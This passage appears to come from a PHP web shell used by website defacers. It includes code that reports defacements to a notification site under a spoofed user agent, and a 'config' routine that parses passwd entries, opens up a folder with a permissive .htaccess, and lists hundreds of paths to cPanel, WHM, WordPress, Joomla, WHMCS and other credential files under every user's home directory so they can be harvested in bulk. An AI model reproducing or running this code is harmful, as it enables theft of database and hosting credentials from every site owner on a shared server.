2335. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
2336. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
2337. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2338. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
2339. $result = curl_exec($curl);
2340. echo $result;
2341. curl_close($curl);
2342. echo "<br>";
2343. }
2344. }
2345. }
2346.  
2347. elseif($_GET['do'] == 'config') {
2348.     if($_POST){
2349.         $passwd = $_POST['passwd'];
2350.         mkdir("ikiconfig_cok", 0777);
2351.         $isi_htc = "Options all\nRequire None\nSatisfy Any";
2352.         $htc = fopen("ikiconfig_cok/.htaccess","w");
2353.         fwrite($htc, $isi_htc);
2354.         preg_match_all('/(.*?):x:/', $passwd, $user_config);
2355.         foreach($user_config[1] as $usere_cok) {
2356.             $user_config_dir = "/home/$usere_cok/public_html/";
2357.             if(is_readable($user_config_dir)) {
2358.                 $grab_config = array(
2359.                                         "/home/$usere_cok/.my.cnf" => "cpanel",
2360.                     "/home/$usere_cok/.accesshash" => "WHM-accesshash",
2361.                     "/home/$usere_cok/public_html/bw-configs/config.ini" => "BosWeb",
2362.                     "/home/$usere_cok/public_html/config/koneksi.php" => "Lokomedia",
2363.                     "/home/$usere_cok/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2364.                     "/home/$usere_cok/public_html/clientarea/configuration.php" => "WHMCS",            
2365.                     "/home/$usere_cok/public_html/whmcs/configuration.php" => "WHMCS",
2366.                     "/home/$usere_cok/public_html/forum/config.php" => "phpBB",
2367.                     "/home/$usere_cok/public_html/sites/default/settings.php" => "Drupal",
2368.                     "/home/$usere_cok/public_html/config/settings.inc.php" => "PrestaShop",
2369.                     "/home/$usere_cok/public_html/app/etc/local.xml" => "Magento",
2370.                     "/home/$usere_cok/public_html/admin/config.php" => "OpenCart",
2371.                     "/home/$usere_cok/public_html/slconfig.php" => "Sitelok",
2372.                     "/home/$usere_cok/public_html/application/config/database.php" => "Ellislab",                  
2373.                     "/home/$usere_cok/public_html/whm/configuration.php" => "WHMCS",
2374.                     "/home/$usere_cok/public_html/whmc/WHM/configuration.ph" => "WHMC",
2375.                     "/home/$usere_cok/public_html/central/configuration.php" => "WHM Central",
2376.                     "/home/$usere_cok/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2377.                     "/home/$usere_cok/public_html/whm/whmcs/configuration.php" => "WHMCS",
2378.                     "/home/$usere_cok/public_html/submitticket.php" => "WHMCS",                                    
2379.                     "/home/$usere_cok/public_html/configuration.php" => "Joomla",                  
2380.                     "/home/$usere_cok/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2381.                     "/home/$usere_cok/public_html/joomla/configuration.php" => "JoomlaJoomla",
2382.                     "/home/$usere_cok/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
2383.                     "/home/$usere_cok/public_html/Home/configuration.php" => "JoomlaHome",
2384.                     "/home/$usere_cok/public_html/HOME/configuration.php" => "JoomlaHome",
2385.                     "/home/$usere_cok/public_html/home/configuration.php" => "JoomlaHome",
2386.                     "/home/$usere_cok/public_html/NEW/configuration.php" => "JoomlaNew",
2387.                     "/home/$usere_cok/public_html/New/configuration.php" => "JoomlaNew",
2388.                     "/home/$usere_cok/public_html/new/configuration.php" => "JoomlaNew",
2389.                     "/home/$usere_cok/public_html/News/configuration.php" => "JoomlaNews",
2390.                     "/home/$usere_cok/public_html/NEWS/configuration.php" => "JoomlaNews",
2391.                     "/home/$usere_cok/public_html/news/configuration.php" => "JoomlaNews",
2392.                     "/home/$usere_cok/public_html/Cms/configuration.php" => "JoomlaCms",
2393.                     "/home/$usere_cok/public_html/CMS/configuration.php" => "JoomlaCms",
2394.                     "/home/$usere_cok/public_html/cms/configuration.php" => "JoomlaCms",
2395.                     "/home/$usere_cok/public_html/Main/configuration.php" => "JoomlaMain",
2396.                     "/home/$usere_cok/public_html/MAIN/configuration.php" => "JoomlaMain",
2397.                     "/home/$usere_cok/public_html/main/configuration.php" => "JoomlaMain",
2398.                     "/home/$usere_cok/public_html/Blog/configuration.php" => "JoomlaBlog",
2399.                     "/home/$usere_cok/public_html/BLOG/configuration.php" => "JoomlaBlog",
2400.                     "/home/$usere_cok/public_html/blog/configuration.php" => "JoomlaBlog",
2401.                     "/home/$usere_cok/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2402.                     "/home/$usere_cok/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2403.                     "/home/$usere_cok/public_html/blogs/configuration.php" => "JoomlaBlogs",
2404.                     "/home/$usere_cok/public_html/beta/configuration.php" => "JoomlaBeta",
2405.                     "/home/$usere_cok/public_html/Beta/configuration.php" => "JoomlaBeta",
2406.                     "/home/$usere_cok/public_html/BETA/configuration.php" => "JoomlaBeta",
2407.                     "/home/$usere_cok/public_html/PRESS/configuration.php" => "JoomlaPress",
2408.                     "/home/$usere_cok/public_html/Press/configuration.php" => "JoomlaPress",
2409.                     "/home/$usere_cok/public_html/press/configuration.php" => "JoomlaPress",
2410.                     "/home/$usere_cok/public_html/Wp/configuration.php" => "JoomlaWp",
2411.                     "/home/$usere_cok/public_html/wp/configuration.php" => "JoomlaWp",
2412.                     "/home/$usere_cok/public_html/WP/configuration.php" => "JoomlaWP",
2413.                     "/home/$usere_cok/public_html/portal/configuration.php" => "JoomlaPortal",
2414.                     "/home/$usere_cok/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2415.                     "/home/$usere_cok/public_html/Portal/configuration.php" => "JoomlaPortal",                 
2416.                     "/home/$usere_cok/public_html/wp-config.php" => "WordPress",
2417.                     "/home/$usere_cok/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2418.                     "/home/$usere_cok/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2419.                     "/home/$usere_cok/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
2420.                     "/home/$usere_cok/public_html/Home/wp-config.php" => "WordPressHome",
2421.                     "/home/$usere_cok/public_html/HOME/wp-config.php" => "WordPressHome",
2422.                     "/home/$usere_cok/public_html/home/wp-config.php" => "WordPressHome",
2423.                     "/home/$usere_cok/public_html/NEW/wp-config.php" => "WordPressNew",
2424.                     "/home/$usere_cok/public_html/New/wp-config.php" => "WordPressNew",
2425.                     "/home/$usere_cok/public_html/new/wp-config.php" => "WordPressNew",
2426.                     "/home/$usere_cok/public_html/News/wp-config.php" => "WordPressNews",
2427.                     "/home/$usere_cok/public_html/NEWS/wp-config.php" => "WordPressNews",
2428.                     "/home/$usere_cok/public_html/news/wp-config.php" => "WordPressNews",
2429.                     "/home/$usere_cok/public_html/Cms/wp-config.php" => "WordPressCms",
2430.                     "/home/$usere_cok/public_html/CMS/wp-config.php" => "WordPressCms",
2431.                     "/home/$usere_cok/public_html/cms/wp-config.php" => "WordPressCms",
2432.                     "/home/$usere_cok/public_html/Main/wp-config.php" => "WordPressMain",
2433.                     "/home/$usere_cok/public_html/MAIN/wp-config.php" => "WordPressMain",
2434.                     "/home/$usere_cok/public_html/main/wp-config.php" => "WordPressMain",
2435.                     "/home/$usere_cok/public_html/Blog/wp-config.php" => "WordPressBlog",
2436.                     "/home/$usere_cok/public_html/BLOG/wp-config.php" => "WordPressBlog",
2437.                     "/home/$usere_cok/public_html/blog/wp-config.php" => "WordPressBlog",
2438.                     "/home/$usere_cok/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2439.                     "/home/$usere_cok/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2440.                     "/home/$usere_cok/public_html/blogs/wp-config.php" => "WordPressBlogs",
2441.                     "/home/$usere_cok/public_html/beta/wp-config.php" => "WordPressBeta",
2442.                     "/home/$usere_cok/public_html/Beta/wp-config.php" => "WordPressBeta",
2443.                     "/home/$usere_cok/public_html/BETA/wp-config.php" => "WordPressBeta",
2444.                     "/home/$usere_cok/public_html/PRESS/wp-config.php" => "WordPressPress",
2445.                     "/home/$usere_cok/public_html/Press/wp-config.php" => "WordPressPress",
2446.                     "/home/$usere_cok/public_html/press/wp-config.php" => "WordPressPress",
2447.                     "/home/$usere_cok/public_html/Wp/wp-config.php" => "WordPressWp",
2448.                     "/home/$usere_cok/public_html/wp/wp-config.php" => "WordPressWp",
2449.                     "/home/$usere_cok/public_html/WP/wp-config.php" => "WordPressWP",
2450.                     "/home/$usere_cok/public_html/portal/wp-config.php" => "WordPressPortal",
2451.                     "/home/$usere_cok/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2452.                     "/home/$usere_cok/public_html/Portal/wp-config.php" => "WordPressPortal",
2453.                     "/home1/$usere_cok/.my.cnf" => "cpanel",
2454.                     "/home1/$usere_cok/.accesshash" => "WHM-accesshash",
2455.                     "/home1/$usere_cok/public_html/bw-configs/config.ini" => "BosWeb",
2456.                     "/home1/$usere_cok/public_html/config/koneksi.php" => "Lokomedia",
2457.                     "/home1/$usere_cok/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2458.                     "/home1/$usere_cok/public_html/clientarea/configuration.php" => "WHMCS",               
2459.                     "/home1/$usere_cok/public_html/whmcs/configuration.php" => "WHMCS",
2460.                     "/home1/$usere_cok/public_html/forum/config.php" => "phpBB",
2461.                     "/home1/$usere_cok/public_html/sites/default/settings.php" => "Drupal",
2462.                     "/home1/$usere_cok/public_html/config/settings.inc.php" => "PrestaShop",
2463.                     "/home1/$usere_cok/public_html/app/etc/local.xml" => "Magento",
2464.                     "/home1/$usere_cok/public_html/admin/config.php" => "OpenCart",
2465.                     "/home1/$usere_cok/public_html/slconfig.php" => "Sitelok",
2466.                     "/home1/$usere_cok/public_html/application/config/database.php" => "Ellislab",                 
2467.                     "/home1/$usere_cok/public_html/whm/configuration.php" => "WHMCS",
2468.                     "/home1/$usere_cok/public_html/whmc/WHM/configuration.ph" => "WHMC",
2469.                     "/home1/$usere_cok/public_html/central/configuration.php" => "WHM Central",
2470.                     "/home1/$usere_cok/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2471.                     "/home1/$usere_cok/public_html/whm/whmcs/configuration.php" => "WHMCS",
2472.                     "/home1/$usere_cok/public_html/submitticket.php" => "WHMCS",                                       
2473.                     "/home1/$usere_cok/public_html/configuration.php" => "Joomla",                 
2474.                     "/home1/$usere_cok/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2475.                     "/home1/$usere_cok/public_html/joomla/configuration.php" => "JoomlaJoomla",
2476.                     "/home1/$usere_cok/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",    
2477.                     "/home1/$usere_cok/public_html/Home/configuration.php" => "JoomlaHome",
2478.                     "/home1/$usere_cok/public_html/HOME/configuration.php" => "JoomlaHome",
2479.                     "/home1/$usere_cok/public_html/home/configuration.php" => "JoomlaHome",
2480.                     "/home1/$usere_cok/public_html/NEW/configuration.php" => "JoomlaNew",
2481.                     "/home1/$usere_cok/public_html/New/configuration.php" => "JoomlaNew",
2482.                     "/home1/$usere_cok/public_html/new/configuration.php" => "JoomlaNew",
2483.                     "/home1/$usere_cok/public_html/News/configuration.php" => "JoomlaNews",
2484.                     "/home1/$usere_cok/public_html/NEWS/configuration.php" => "JoomlaNews",
2485.                     "/home1/$usere_cok/public_html/news/configuration.php" => "JoomlaNews",
2486.                     "/home1/$usere_cok/public_html/Cms/configuration.php" => "JoomlaCms",
2487.                     "/home1/$usere_cok/public_html/CMS/configuration.php" => "JoomlaCms",
2488.                     "/home1/$usere_cok/public_html/cms/configuration.php" => "JoomlaCms",
2489.                     "/home1/$usere_cok/public_html/Main/configuration.php" => "JoomlaMain",
2490.                     "/home1/$usere_cok/public_html/MAIN/configuration.php" => "JoomlaMain",
2491.                     "/home1/$usere_cok/public_html/main/configuration.php" => "JoomlaMain",
2492.                     "/home1/$usere_cok/public_html/Blog/configuration.php" => "JoomlaBlog",
2493.                     "/home1/$usere_cok/public_html/BLOG/configuration.php" => "JoomlaBlog",
2494.                     "/home1/$usere_cok/public_html/blog/configuration.php" => "JoomlaBlog",
2495.                     "/home1/$usere_cok/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2496.                     "/home1/$usere_cok/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2497.                     "/home1/$usere_cok/public_html/blogs/configuration.php" => "JoomlaBlogs",
2498.                     "/home1/$usere_cok/public_html/beta/configuration.php" => "JoomlaBeta",
2499.                     "/home1/$usere_cok/public_html/Beta/configuration.php" => "JoomlaBeta",
2500.                     "/home1/$usere_cok/public_html/BETA/configuration.php" => "JoomlaBeta",
2501.                     "/home1/$usere_cok/public_html/PRESS/configuration.php" => "JoomlaPress",
2502.                     "/home1/$usere_cok/public_html/Press/configuration.php" => "JoomlaPress",
2503.                     "/home1/$usere_cok/public_html/press/configuration.php" => "JoomlaPress",
2504.                     "/home1/$usere_cok/public_html/Wp/configuration.php" => "JoomlaWp",
2505.                     "/home1/$usere_cok/public_html/wp/configuration.php" => "JoomlaWp",
2506.                     "/home1/$usere_cok/public_html/WP/configuration.php" => "JoomlaWP",
2507.                     "/home1/$usere_cok/public_html/portal/configuration.php" => "JoomlaPortal",
2508.                     "/home1/$usere_cok/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2509.                     "/home1/$usere_cok/public_html/Portal/configuration.php" => "JoomlaPortal",                
2510.                     "/home1/$usere_cok/public_html/wp-config.php" => "WordPress",
2511.                     "/home1/$usere_cok/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2512.                     "/home1/$usere_cok/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2513.                     "/home1/$usere_cok/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",       
2514.                     "/home1/$usere_cok/public_html/Home/wp-config.php" => "WordPressHome",
2515.                     "/home1/$usere_cok/public_html/HOME/wp-config.php" => "WordPressHome",
2516.                     "/home1/$usere_cok/public_html/home/wp-config.php" => "WordPressHome",
2517.                     "/home1/$usere_cok/public_html/NEW/wp-config.php" => "WordPressNew",
2518.                     "/home1/$usere_cok/public_html/New/wp-config.php" => "WordPressNew",
2519.                     "/home1/$usere_cok/public_html/new/wp-config.php" => "WordPressNew",
2520.                     "/home1/$usere_cok/public_html/News/wp-config.php" => "WordPressNews",
2521.                     "/home1/$usere_cok/public_html/NEWS/wp-config.php" => "WordPressNews",
2522.                     "/home1/$usere_cok/public_html/news/wp-config.php" => "WordPressNews",
2523.                     "/home1/$usere_cok/public_html/Cms/wp-config.php" => "WordPressCms",
2524.                     "/home1/$usere_cok/public_html/CMS/wp-config.php" => "WordPressCms",
2525.                     "/home1/$usere_cok/public_html/cms/wp-config.php" => "WordPressCms",
2526.                     "/home1/$usere_cok/public_html/Main/wp-config.php" => "WordPressMain",
2527.                     "/home1/$usere_cok/public_html/MAIN/wp-config.php" => "WordPressMain",
2528.                     "/home1/$usere_cok/public_html/main/wp-config.php" => "WordPressMain",
2529.                     "/home1/$usere_cok/public_html/Blog/wp-config.php" => "WordPressBlog",
2530.                     "/home1/$usere_cok/public_html/BLOG/wp-config.php" => "WordPressBlog",
2531.                     "/home1/$usere_cok/public_html/blog/wp-config.php" => "WordPressBlog",
2532.                     "/home1/$usere_cok/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2533.                     "/home1/$usere_cok/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2534.                     "/home1/$usere_cok/public_html/blogs/wp-config.php" => "WordPressBlogs",
2535.                     "/home1/$usere_cok/public_html/beta/wp-config.php" => "WordPressBeta",
2536.                     "/home1/$usere_cok/public_html/Beta/wp-config.php" => "WordPressBeta",
2537.                     "/home1/$usere_cok/public_html/BETA/wp-config.php" => "WordPressBeta",
2538.                     "/home1/$usere_cok/public_html/PRESS/wp-config.php" => "WordPressPress",
2539.                     "/home1/$usere_cok/public_html/Press/wp-config.php" => "WordPressPress",
2540.                     "/home1/$usere_cok/public_html/press/wp-config.php" => "WordPressPress",
2541.                     "/home1/$usere_cok/public_html/Wp/wp-config.php" => "WordPressWp",
2542.                     "/home1/$usere_cok/public_html/wp/wp-config.php" => "WordPressWp",
2543.                     "/home1/$usere_cok/public_html/WP/wp-config.php" => "WordPressWP",
2544.                     "/home1/$usere_cok/public_html/portal/wp-config.php" => "WordPressPortal",
2545.                     "/home1/$usere_cok/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2546.                     "/home1/$usere_cok/public_html/Portal/wp-config.php" => "WordPressPortal",
2547.                     "/home2/$usere_cok/.my.cnf" => "cpanel",
2548.                     "/home2/$usere_cok/.accesshash" => "WHM-accesshash",
2549.                     "/home2/$usere_cok/public_html/bw-configs/config.ini" => "BosWeb",
2550.                     "/home2/$usere_cok/public_html/config/koneksi.php" => "Lokomedia",
2551.                     "/home2/$usere_cok/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2552.                     "/home2/$usere_cok/public_html/clientarea/configuration.php" => "WHMCS",               
2553.                     "/home2/$usere_cok/public_html/whmcs/configuration.php" => "WHMCS",
2554.                     "/home2/$usere_cok/public_html/forum/config.php" => "phpBB",
2555.                     "/home2/$usere_cok/public_html/sites/default/settings.php" => "Drupal",
2556.                     "/home2/$usere_cok/public_html/config/settings.inc.php" => "PrestaShop",
2557.                     "/home2/$usere_cok/public_html/app/etc/local.xml" => "Magento",
2558.                     "/home2/$usere_cok/public_html/admin/config.php" => "OpenCart",
2559.                     "/home2/$usere_cok/public_html/slconfig.php" => "Sitelok",
2560.                     "/home2/$usere_cok/public_html/application/config/database.php" => "Ellislab",                 
2561.                     "/home2/$usere_cok/public_html/whm/configuration.php" => "WHMCS",
2562.                     "/home2/$usere_cok/public_html/whmc/WHM/configuration.ph" => "WHMC",
2563.                     "/home2/$usere_cok/public_html/central/configuration.php" => "WHM Central",
2564.                     "/home2/$usere_cok/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2565.                     "/home2/$usere_cok/public_html/whm/whmcs/configuration.php" => "WHMCS",
2566.                     "/home2/$usere_cok/public_html/submitticket.php" => "WHMCS",                                       
2567.                     "/home2/$usere_cok/public_html/configuration.php" => "Joomla",                 
2568.                     "/home2/$usere_cok/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2569.                     "/home2/$usere_cok/public_html/joomla/configuration.php" => "JoomlaJoomla",
2570.                     "/home2/$usere_cok/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",    
2571.                     "/home2/$usere_cok/public_html/Home/configuration.php" => "JoomlaHome",
2572.                     "/home2/$usere_cok/public_html/HOME/configuration.php" => "JoomlaHome",
2573.                     "/home2/$usere_cok/public_html/home/configuration.php" => "JoomlaHome",
2574.                     "/home2/$usere_cok/public_html/NEW/configuration.php" => "JoomlaNew",
2575.                     "/home2/$usere_cok/public_html/New/configuration.php" => "JoomlaNew",
2576.                     "/home2/$usere_cok/public_html/new/configuration.php" => "JoomlaNew",
2577.                     "/home2/$usere_cok/public_html/News/configuration.php" => "JoomlaNews",
2578.                     "/home2/$usere_cok/public_html/NEWS/configuration.php" => "JoomlaNews",
2579.                     "/home2/$usere_cok/public_html/news/configuration.php" => "JoomlaNews",
2580.                     "/home2/$usere_cok/public_html/Cms/configuration.php" => "JoomlaCms",
2581.                     "/home2/$usere_cok/public_html/CMS/configuration.php" => "JoomlaCms",
2582.                     "/home2/$usere_cok/public_html/cms/configuration.php" => "JoomlaCms",
2583.                     "/home2/$usere_cok/public_html/Main/configuration.php" => "JoomlaMain",
2584.                     "/home2/$usere_cok/public_html/MAIN/configuration.php" => "JoomlaMain",
2585.                     "/home2/$usere_cok/public_html/main/configuration.php" => "JoomlaMain",
2586.                     "/home2/$usere_cok/public_html/Blog/configuration.php" => "JoomlaBlog",
2587.                     "/home2/$usere_cok/public_html/BLOG/configuration.php" => "JoomlaBlog",
2588.                     "/home2/$usere_cok/public_html/blog/configuration.php" => "JoomlaBlog",
2589.                     "/home2/$usere_cok/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2590.                     "/home2/$usere_cok/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2591.                     "/home2/$usere_cok/public_html/blogs/configuration.php" => "JoomlaBlogs",
2592.                     "/home2/$usere_cok/public_html/beta/configuration.php" => "JoomlaBeta",
2593.                     "/home2/$usere_cok/public_html/Beta/configuration.php" => "JoomlaBeta",
2594.                     "/home2/$usere_cok/public_html/BETA/configuration.php" => "JoomlaBeta",
2595.                     "/home2/$usere_cok/public_html/PRESS/configuration.php" => "JoomlaPress",
2596.                     "/home2/$usere_cok/public_html/Press/configuration.php" => "JoomlaPress",
2597.                     "/home2/$usere_cok/public_html/press/configuration.php" => "JoomlaPress",
2598.                     "/home2/$usere_cok/public_html/Wp/configuration.php" => "JoomlaWp",
2599.                     "/home2/$usere_cok/public_html/wp/configuration.php" => "JoomlaWp",
2600.                     "/home2/$usere_cok/public_html/WP/configuration.php" => "JoomlaWP",
2601.                     "/home2/$usere_cok/public_html/portal/configuration.php" => "JoomlaPortal",
2602.                     "/home2/$usere_cok/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2603.                     "/home2/$usere_cok/public_html/Portal/configuration.php" => "JoomlaPortal",                
2604.                     "/home2/$usere_cok/public_html/wp-config.php" => "WordPress",
2605.                     "/home2/$usere_cok/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2606.                     "/home2/$usere_cok/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2607.                     "/home2/$usere_cok/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",       
2608.                     "/home2/$usere_cok/public_html/Home/wp-config.php" => "WordPressHome",
2609.                     "/home2/$usere_cok/public_html/HOME/wp-config.php" => "WordPressHome",
2610.                     "/home2/$usere_cok/public_html/home/wp-config.php" => "WordPressHome",
2611.                     "/home2/$usere_cok/public_html/NEW/wp-config.php" => "WordPressNew",
2612.                     "/home2/$usere_cok/public_html/New/wp-config.php" => "WordPressNew",
2613.                     "/home2/$usere_cok/public_html/new/wp-config.php" => "WordPressNew",
2614.                     "/home2/$usere_cok/public_html/News/wp-config.php" => "WordPressNews",
2615.                     "/home2/$usere_cok/public_html/NEWS/wp-config.php" => "WordPressNews",
2616.                     "/home2/$usere_cok/public_html/news/wp-config.php" => "WordPressNews",
2617.                     "/home2/$usere_cok/public_html/Cms/wp-config.php" => "WordPressCms",
2618.                     "/home2/$usere_cok/public_html/CMS/wp-config.php" => "WordPressCms",
2619.                     "/home2/$usere_cok/public_html/cms/wp-config.php" => "WordPressCms",
2620.                     "/home2/$usere_cok/public_html/Main/wp-config.php" => "WordPressMain",
2621.                     "/home2/$usere_cok/public_html/MAIN/wp-config.php" => "WordPressMain",
2622.                     "/home2/$usere_cok/public_html/main/wp-config.php" => "WordPressMain",
2623.                     "/home2/$usere_cok/public_html/Blog/wp-config.php" => "WordPressBlog",
2624.                     "/home2/$usere_cok/public_html/BLOG/wp-config.php" => "WordPressBlog",
2625.                     "/home2/$usere_cok/public_html/blog/wp-config.php" => "WordPressBlog",
2626.                     "/home2/$usere_cok/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2627.                     "/home2/$usere_cok/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2628.                     "/home2/$usere_cok/public_html/blogs/wp-config.php" => "WordPressBlogs",
2629.                     "/home2/$usere_cok/public_html/beta/wp-config.php" => "WordPressBeta",
2630.                     "/home2/$usere_cok/public_html/Beta/wp-config.php" => "WordPressBeta",
2631.                     "/home2/$usere_cok/public_html/BETA/wp-config.php" => "WordPressBeta",
2632.                     "/home2/$usere_cok/public_html/PRESS/wp-config.php" => "WordPressPress",
2633.                     "/home2/$usere_cok/public_html/Press/wp-config.php" => "WordPressPress",
2634.                     "/home2/$usere_cok/public_html/press/wp-config.php" => "WordPressPress",
2635.                     "/home2/$usere_cok/public_html/Wp/wp-config.php" => "WordPressWp",
2636.                     "/home2/$usere_cok/public_html/wp/wp-config.php" => "WordPressWp",
2637.                     "/home2/$usere_cok/public_html/WP/wp-config.php" => "WordPressWP",
2638.                     "/home2/$usere_cok/public_html/portal/wp-config.php" => "WordPressPortal",
2639.                     "/home2/$usere_cok/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2640.                     "/home2/$usere_cok/public_html/Portal/wp-config.php" => "WordPressPortal",
2641.                     "/home3/$usere_cok/.my.cnf" => "cpanel",
2642.                     "/home3/$usere_cok/.accesshash" => "WHM-accesshash",
2643.                     "/home3/$usere_cok/public_html/bw-configs/config.ini" => "BosWeb",
2644.                     "/home3/$usere_cok/public_html/config/koneksi.php" => "Lokomedia",
2645.                     "/home3/$usere_cok/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2646.                     "/home3/$usere_cok/public_html/clientarea/configuration.php" => "WHMCS",               
2647.                     "/home3/$usere_cok/public_html/whmcs/configuration.php" => "WHMCS",
2648.                     "/home3/$usere_cok/public_html/forum/config.php" => "phpBB",
2649.                     "/home3/$usere_cok/public_html/sites/default/settings.php" => "Drupal",
2650.                     "/home3/$usere_cok/public_html/config/settings.inc.php" => "PrestaShop",
2651.                     "/home3/$usere_cok/public_html/app/etc/local.xml" => "Magento",
2652.                     "/home3/$usere_cok/public_html/admin/config.php" => "OpenCart",
2653.                     "/home3/$usere_cok/public_html/slconfig.php" => "Sitelok",
2654.                     "/home3/$usere_cok/public_html/application/config/database.php" => "Ellislab",                 
2655.                     "/home3/$usere_cok/public_html/whm/configuration.php" => "WHMCS",
2656.                     "/home3/$usere_cok/public_html/whmc/WHM/configuration.ph" => "WHMC",
2657.                     "/home3/$usere_cok/public_html/central/configuration.php" => "WHM Central",
2658.                     "/home3/$usere_cok/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2659.                     "/home3/$usere_cok/public_html/whm/whmcs/configuration.php" => "WHMCS",
2660.                     "/home3/$usere_cok/public_html/submitticket.php" => "WHMCS",                                       
2661.                     "/home3/$usere_cok/public_html/configuration.php" => "Joomla",                 
2662.                     "/home3/$usere_cok/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2663.                     "/home3/$usere_cok/public_html/joomla/configuration.php" => "JoomlaJoomla",
2664.                     "/home3/$usere_cok/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",    
2665.                     "/home3/$usere_cok/public_html/Home/configuration.php" => "JoomlaHome",
2666.                     "/home3/$usere_cok/public_html/HOME/configuration.php" => "JoomlaHome",
2667.                     "/home3/$usere_cok/public_html/home/configuration.php" => "JoomlaHome",
2668.                     "/home3/$usere_cok/public_html/NEW/configuration.php" => "JoomlaNew",
2669.                     "/home3/$usere_cok/public_html/New/configuration.php" => "JoomlaNew",
2670.                     "/home3/$usere_cok/public_html/new/configuration.php" => "JoomlaNew",
2671.                     "/home3/$usere_cok/public_html/News/configuration.php" => "JoomlaNews",
2672.                     "/home3/$usere_cok/public_html/NEWS/configuration.php" => "JoomlaNews",
2673.                     "/home3/$usere_cok/public_html/news/configuration.php" => "JoomlaNews",
2674.                     "/home3/$usere_cok/public_html/Cms/configuration.php" => "JoomlaCms",
2675.                     "/home3/$usere_cok/public_html/CMS/configuration.php" => "JoomlaCms",
2676.                     "/home3/$usere_cok/public_html/cms/configuration.php" => "JoomlaCms",
2677.                     "/home3/$usere_cok/public_html/Main/configuration.php" => "JoomlaMain",
2678.                     "/home3/$usere_cok/public_html/MAIN/configuration.php" => "JoomlaMain",
2679.                     "/home3/$usere_cok/public_html/main/configuration.php" => "JoomlaMain",
2680.                     "/home3/$usere_cok/public_html/Blog/configuration.php" => "JoomlaBlog",
2681.                     "/home3/$usere_cok/public_html/BLOG/configuration.php" => "JoomlaBlog",
2682.                     "/home3/$usere_cok/public_html/blog/configuration.php" => "JoomlaBlog",
2683.                     "/home3/$usere_cok/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2684.                     "/home3/$usere_cok/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2685.                     "/home3/$usere_cok/public_html/blogs/configuration.php" => "JoomlaBlogs",
2686.                     "/home3/$usere_cok/public_html/beta/configuration.php" => "JoomlaBeta",
2687.                     "/home3/$usere_cok/public_html/Beta/configuration.php" => "JoomlaBeta",
2688.                     "/home3/$usere_cok/public_html/BETA/configuration.php" => "JoomlaBeta",
2689.                     "/home3/$usere_cok/public_html/PRESS/configuration.php" => "JoomlaPress",
2690.                     "/home3/$usere_cok/public_html/Press/configuration.php" => "JoomlaPress",
2691.                     "/home3/$usere_cok/public_html/press/configuration.php" => "JoomlaPress",
2692.                     "/home3/$usere_cok/public_html/Wp/configuration.php" => "JoomlaWp",
2693.                     "/home3/$usere_cok/public_html/wp/configuration.php" => "JoomlaWp",
2694.                     "/home3/$usere_cok/public_html/WP/configuration.php" => "JoomlaWP",
2695.                     "/home3/$usere_cok/public_html/portal/configuration.php" => "JoomlaPortal",
2696.                     "/home3/$usere_cok/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2697.                     "/home3/$usere_cok/public_html/Portal/configuration.php" => "JoomlaPortal",                
2698.                     "/home3/$usere_cok/public_html/wp-config.php" => "WordPress",
2699.                     "/home3/$usere_cok/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2700.                     "/home3/$usere_cok/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2701.                     "/home3/$usere_cok/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",       
2702.                     "/home3/$usere_cok/public_html/Home/wp-config.php" => "WordPressHome",
2703.                     "/home3/$usere_cok/public_html/HOME/wp-config.php" => "WordPressHome",
2704.                     "/home3/$usere_cok/public_html/home/wp-config.php" => "WordPressHome",
2705.                     "/home3/$usere_cok/public_html/NEW/wp-config.php" => "WordPressNew",
2706.                     "/home3/$usere_cok/public_html/New/wp-config.php" => "WordPressNew",
